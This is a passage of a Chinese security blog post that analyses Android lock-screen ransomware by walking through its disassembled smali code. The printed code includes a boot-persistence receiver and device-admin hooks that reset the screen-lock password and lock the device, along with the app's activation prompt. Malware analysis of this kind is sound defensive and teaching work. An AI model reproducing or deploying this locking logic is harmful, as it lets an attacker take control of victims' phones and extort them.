00000226  const-string        v16, "626fcaf7df0278de9aff3aaca97a5b8c88fd66ed54f277cc91852adc95565ff06a5cfa22ea1bf0c0fae034132b8a4d212ba95bad14ad34cb812d751d9e47c41df05c9fffa333772bcd5089b13e5600c8fd9587ce8f403c4d5b8156d4d24c94bfd4ed91fb50e3c6a89f070393ab0a03f3"
0000022A  invoke-virtual/range StringBuffer->append(String)StringBuffer, v15 .. v16  # stringbuffer.append(v16)
00000230  move-result-object  v15
00000232  invoke-virtual      StringBuffer->toString()String, v15
00000238  move-result-object  v15
0000023A  move-object         v4, v15
0000023C  new-instance        v15, StringBuffer
00000240  move-object/from16  v19, v15
00000244  move-object/from16  v15, v19
00000248  move-object/from16  v16, v19
0000024C  invoke-direct/range StringBuffer-><init>()V, v16 .. v16  # stringbuffer2 = new StringBuffer()
00000252  move-object/from16  v16, v1
00000256  move-object/from16  v0, v16
0000025A  iget-object         v0, v0, s->Lycorisradiata:String
0000025E  move-object/from16  v16, v0
00000262  invoke-virtual/range StringBuffer->append(String)StringBuffer, v15 .. v16  # stringbuffer2.append(this.Lycorisradiata)
00000268  move-result-object  v15
0000026A  const-string        v16, "60ee210a612f306f774a08a5a865c657ead0311698369b26d95e1c6151b5ee326053086a53edd02dafd2ceff8b6797ceeb75bdd4821b3eb747f256bb22696f8854ba778baee912cbc74042d306579e70cf0965d9cb30c048"
0000026E  invoke-virtual/range StringBuffer->append(String)StringBuffer, v15 .. v16  # stringbuffer2.append(v16)
00000274  move-result-object  v15
00000276  invoke-virtual      StringBuffer->toString()String, v15
0000027C  move-result-object  v15
0000027E  move-object         v5, v15
00000280  new-instance        v15, StringBuffer
00000284  move-object/from16  v19, v15
00000288  move-object/from16  v15, v19
0000028C  move-object/from16  v16, v19
00000290  invoke-direct/range StringBuffer-><init>()V, v16 .. v16  # stringbuffer3 = new StringBuffer()
00000296  move-object/from16  v16, v1
0000029A  move-object/from16  v0, v16
0000029E  iget-object         v0, v0, s->Lycorisradiata:String
000002A2  move-object/from16  v16, v0
000002A6  invoke-virtual/range StringBuffer->append(String)StringBuffer, v15 .. v16  # stringbuffer3.append(this.Lycorisradiata)
000002AC  move-result-object  v15
000002AE  const-string        v16, "ebbcd47d6afa253eba111409c5ebe0a3751098207629ac6dcf5ffadff17f0330e3ed51aa320a6b30a613feffaf16a7bf"
000002B2  invoke-virtual/range StringBuffer->append(String)StringBuffer, v15 .. v16  # stringbuffer3.append(v16)
000002B8  move-result-object  v15
000002BA  invoke-virtual      StringBuffer->toString()String, v15
000002C0  move-result-object  v15
000002C2  move-object         v6, v15
000002C4  move-object         v15, v4
000002C6  invoke-static       DU->getbah(String)String, v15
000002CC  move-result-object  v15
000002CE  move-object         v7, v15
000002D0  move-object         v15, v5
000002D2  invoke-static       DU->getbah(String)String, v15
000002D8  move-result-object  v15
000002DA  move-object         v8, v15
000002DC  move-object         v15, v6
000002DE  invoke-static       DU->getbah(String)String, v15
000002E4  move-result-object  v15
000002E6  move-object         v9, v15
000002E8  move-object         v15, v1
000002EA  iget-object         v15, v15, s->wb:TextView
000002EE  move-object/from16  v16, v1
000002F2  move-object/from16  v0, v16
000002F6  iget-object         v0, v0, s->des:DU
000002FA  move-object/from16  v16, v0
000002FE  move-object/from16  v17, v7
00000302  invoke-virtual/range DU->decrypt(String)String, v16 .. v17
00000308  move-result-object  v16
0000030A  invoke-virtual/range TextView->append(CharSequence)V, v15 .. v16  # s.wb.append(s.des.decrypt(DU.getbah(v4)))
00000310  move-object         v15, v1
00000312  iget-object         v15, v15, s->bah:TextView
00000316  move-object/from16  v16, v1
0000031A  move-object/from16  v0, v16
0000031E  iget-object         v0, v0, s->des:DU
00000322  move-object/from16  v16, v0
00000326  move-object/from16  v17, v8
0000032A  invoke-virtual/range DU->decrypt(String)String, v16 .. v17
00000330  move-result-object  v16
00000332  invoke-virtual/range TextView->append(CharSequence)V, v15 .. v16  # s.wb.append(s.des.decrypt(DU.getbah(v5)))
00000338  move-object         v15, v1
0000033A  invoke-virtual      s->getResources()Resources, v15
00000340  move-result-object  v15
00000342  const/high16        v16, 0x7F060000
00000346  invoke-virtual/range Resources->openRawResource(I)InputStream, v15 .. v16
0000034C  move-result-object  v15
0000034E  move-object         v10, v15
00000350  move-object         v15, v10
00000352  invoke-static       BAH->getString(InputStream)String, v15  # string = BAH.getString(s.getResources().openRawResource(0x7F060000))
00000358  move-result-object  v15
0000035A  move-object         v11, v15
0000035C  move-object         v15, v11
0000035E  const-string        v16, "\n"
00000362  const-string        v17, ""
00000366  invoke-virtual/range String->replaceAll(String, String)String, v15 .. v17  # string.replaceAll("\n", "")
0000036C  move-result-object  v15
0000036E  move-object         v12, v15
00000370  move-object         v15, v12
00000372  invoke-static       DU->getsss(String)String, v15
00000378  move-result-object  v15
0000037A  move-object         v13, v15
0000037C  move-object         v15, v1
0000037E  iget-object         v15, v15, s->cjk:TextView
00000382  move-object/from16  v16, v13
00000386  invoke-virtual/range TextView->append(CharSequence)V, v15 .. v16  # s.cjk.append(DU.getsss(string))
0000038C  move-object         v15, v1
0000038E  iget-object         v15, v15, s->tv:TextView
00000392  move-object/from16  v16, v1
00000396  move-object/from16  v0, v16
0000039A  iget-object         v0, v0, s->des:DU
0000039E  move-object/from16  v16, v0
000003A2  move-object/from16  v17, v9
000003A6  invoke-virtual/range DU->decrypt(String)String, v16 .. v17
000003AC  move-result-object  v16
000003AE  invoke-virtual/range TextView->append(CharSequence)V, v15 .. v16
:3B4
000003B4  return-void
:3B6
000003B6  move-exception      v15
000003B8  move-object         v4, v15
000003BA  goto                :3B4
          .catch Exception {:1F8 .. :3B4} :3B6
.end method

s服务小结:主要提供解锁服务和一些布局界面的设置

  • 2) 开机完成的广播接收器bbb

    <receiver android:name="bbb">
        <intent-filter android:priority="2147483647">
          <action android:name="android.intent.action.BOOT_COMPLETED" />
        </intent-filter>
      </receiver>

    很明显,由下面的分析可以知道这是一个开机启动s服务的广播

    .method public onReceive(Context, Intent)V
            .registers 18
            .annotation system Signature
                value = {
                    "(",
                    "Landroid/content/Context;",
                    "Landroid/content/Intent;",
                    ")V"
                }
            .end annotation
            .annotation runtime Override
            .end annotation
    00000000  move-object         v0, p0
    00000002  move-object/from16  v1, p1
    00000006  move-object/from16  v2, p2  # mIntent
    0000000A  move-object         v7, v2
    0000000C  invoke-virtual      Intent->getAction()String, v7
    00000012  move-result-object  v7
    00000014  const-string        v8, "android.intent.action.BOOT_COMPLETED"
    00000018  invoke-virtual      String->equals(Object)Z, v7, v8  # mIntent.getAction.equals("android.intent.action.BOOT_COMPLETED")
    0000001E  move-result         v7
    00000020  if-eqz              v7, :66
    :24
    00000024  move-object         v7, v0
    00000026  invoke-virtual      bbb->abortBroadcast()V, v7  # this.abortBroadcast()
    0000002C  new-instance        v7, Intent
    00000030  move-object         v14, v7
    00000032  move-object         v7, v14
    00000034  move-object         v8, v14
    00000036  move-object         v9, v1
    :38
    00000038  const-string        v10, "com.cjk.s"
    0000003C  invoke-static       Class->forName(String)Class, v10  # class.forName("com.cjk.s")
    :42
    00000042  move-result-object  v10
    00000044  invoke-direct       Intent-><init>(Context, Class)V, v8, v9, v10  # intent2 = new Intent(context, class.forName("com.cjk.s"))
    0000004A  move-object         v4, v7
    0000004C  move-object         v7, v4
    0000004E  const/high16        v8, 0x10000000
    00000052  invoke-virtual      Intent->addFlags(I)Intent, v7, v8  # intent2.addFlags(0x10000000)
    00000058  move-result-object  v7
    0000005A  move-object         v7, v1
    0000005C  move-object         v8, v4
    0000005E  invoke-virtual      Context->startService(Intent)ComponentName, v7, v8  # startService(intent2)
    00000064  move-result-object  v7
    :66
    00000066  return-void
  • 3)设备管理员激活时的广播接收器

    <receiver android:description="@string/hello" android:name=".MyAdmin">
        <meta-data android:name="android.app.device_admin" android:resource="@xml/my_admin" />
        <intent-filter>
          <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
        </intent-filter>
      </receiver>

    一旦用户点击确认激活设备管理器,首先执行onEnabled方法,重置锁屏密码,然后触发密码更改后调用的方法onPasswordChanged,进行了锁屏行为,并且在用户想要解除该设备管理员身份的时候也会进行锁屏行为

    .method public onEnabled(Context, Intent)V
            .registers 22
            .annotation system Signature
                value = {
                    "(",
                    "Landroid/content/Context;",
                    "Landroid/content/Intent;",
                    ")V"
                }
            .end annotation
            .annotation runtime Override
            .end annotation
    00000000  move-object/from16  v0, p0
    00000004  move-object/from16  v1, p1
    00000008  move-object/from16  v2, p2
    0000000C  move-object         v11, v1
    0000000E  invoke-virtual      Context->getResources()Resources, v11
    00000014  move-result-object  v11
    00000016  const               v12, 0x7F060002
    0000001C  invoke-virtual      Resources->openRawResource(I)InputStream, v11, v12
    00000022  move-result-object  v11
    00000024  move-object         v4, v11
    00000026  move-object         v11, v4
    00000028  invoke-static       BAH->getString(InputStream)String, v11  # BAH.getString(context.getResources().openRawResource(0x7f060002))
    0000002E  move-result-object  v11
    00000030  move-object         v5, v11
    00000032  move-object         v11, v5
    00000034  const-string        v12, "\n"
    00000038  const-string        v13, ""
    0000003C  invoke-virtual      String->replaceAll(String, String)String, v11, v12, v13
    00000042  move-result-object  v11
    00000044  move-object         v6, v11
    00000046  move-object         v11, v6
    00000048  invoke-static       DU->getsss(String)String, v11  # passwd = DU.getsss(BAH.getString(context.getResources().openRawResource(0x7f060002)).replace("\n", ""))
    0000004E  move-result-object  v11
    00000050  move-object         v7, v11
    00000052  new-instance        v11, Intent
    00000056  move-object/from16  v18, v11
    0000005A  move-object/from16  v11, v18
    0000005E  move-object/from16  v12, v18
    00000062  move-object         v13, v1
    :64
    00000064  const-string        v14, "com.cjk.s"
    00000068  invoke-static       Class->forName(String)Class, v14
    :6E
    0000006E  move-result-object  v14
    00000070  invoke-direct       Intent-><init>(Context, Class)V, v12, v13, v14  # intent = new Intent(Class.forName("com.cjk.s"))
    00000076  move-object         v8, v11
    00000078  move-object         v11, v8
    0000007A  const/high16        v12, 0x10000000
    0000007E  invoke-virtual      Intent->setFlags(I)Intent, v11, v12
    00000084  move-result-object  v11
    00000086  move-object         v11, v1
    00000088  move-object         v12, v8
    0000008A  invoke-virtual      Context->startService(Intent)ComponentName, v11, v12  # startService(intent)
    00000090  move-result-object  v11
    00000092  move-object         v11, v0
    00000094  move-object         v12, v1
    00000096  invoke-virtual      MyAdmin->getManager(Context)DevicePolicyManager, v11, v12  # this.getManager(context)
    0000009C  move-result-object  v11
    0000009E  move-object         v12, v7
    000000A0  const/4             v13, 0
    000000A2  invoke-virtual      DevicePolicyManager->resetPassword(String, I)Z, v11, v12, v13  # this.getManager(context).resetPassword(passwd, 0)
    000000A8  move-result         v11
    000000AA  move-object         v11, v0
    000000AC  move-object         v12, v1
    000000AE  move-object         v13, v2
    000000B0  invoke-super        DeviceAdminReceiver->onEnabled(Context, Intent)V, v11, v12, v13
    000000B6  return-void

    代码大致相同,不再赘述

    @Override public void onPasswordChanged(Context arg13, Intent arg14) {
          String v7 = DU.getsss(BAH.getString(arg13.getResources().openRawResource(0x7F060002)).replaceAll("\n", ""));
          this.getManager(arg13).lockNow();
          this.getManager(arg13).resetPassword(v7, 0);
          super.onPasswordChanged(arg13, arg14);
      }
    
      @Override public CharSequence onDisableRequested(Context arg13, Intent arg14) {
          String v7 = DU.getsss(BAH.getString(arg13.getResources().openRawResource(0x7F060002)).replaceAll("\n", ""));
          this.getManager(arg13).lockNow();
          this.getManager(arg13).resetPassword(v7, 0);
          return super.onDisableRequested(arg13, arg14);
      }
  • 4) 启动Activity
    主要在oncreate方法中,调用了开启激活设备管理员的界面

    .method private activiteDevice()V
            .registers 15
            .annotation system Signature
                value = {
                    "()V"
                }
            .end annotation
    00000000  move-object         v0, p0
    00000002  new-instance        v6, Intent
    00000006  move-object         v13, v6
    00000008  move-object         v6, v13
    0000000A  move-object         v7, v13
    0000000C  const-string        v8, "android.app.action.ADD_DEVICE_ADMIN"
    00000010  invoke-direct       Intent-><init>(String)V, v7, v8  # intent = new Intent("android.app.action.ADD_DEVICE_ADMIN")
    00000016  move-object         v2, v6
    00000018  new-instance        v6, ComponentName
    0000001C  move-object         v13, v6
    0000001E  move-object         v6, v13
    00000020  move-object         v7, v13
    00000022  move-object         v8, v0
    :24
    00000024  const-string        v9, "com.cjk.MyAdmin"
    00000028  invoke-static       Class->forName(String)Class, v9  # Class.forName("com.cjk.MyAdmin")
    :2E
    0000002E  move-result-object  v9
    00000030  invoke-direct       ComponentName-><init>(Context, Class)V, v7, v8, v9  # mConponent = new ComponentName(this, Class.forName("com.cjk.MyAdmin"))
    00000036  move-object         v3, v6
    00000038  move-object         v6, v2
    0000003A  const-string        v7, "android.app.extra.DEVICE_ADMIN"
    0000003E  move-object         v8, v3
    00000040  invoke-virtual      Intent->putExtra(String, Parcelable)Intent, v6, v7, v8  # intent.putExtra("android.app.extra.DEVICE_ADMIN", mConponent)
    00000046  move-result-object  v6
    00000048  move-object         v6, v0
    0000004A  move-object         v7, v2
    0000004C  const/4             v8, 0
    0000004E  invoke-virtual      M->startActivityForResult(Intent, I)V, v6, v7, v8  # startActivityForResult(intent, 0)

总结

至此,基本全部分析完毕,主要在这个分析的过程中来了解smali语法,当编译成java的语法出错时可以看汇编代码,当然也可以尝试进行一些软件破解行为。

参考

google官方smali语法 https://source.android.com/devices/tech/dalvik/dalvik-bytecode
Dalvik opcodes http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html
深入理解Dalvik字节码指令及Smali文件 https://blog.csdn.net/dd864140130/article/details/52076515

关键词:[‘安全技术’, ‘移动安全’]


author

旭达网络

旭达网络技术博客,曾记录各种技术问题,一贴搞定.
本文采用知识共享署名 4.0 国际许可协议进行许可。

We notice you're using an adblocker. If you like our webite please keep us running by whitelisting this site in your ad blocker. We’re serving quality, related ads only. Thank you!

I've whitelisted your website.

Not now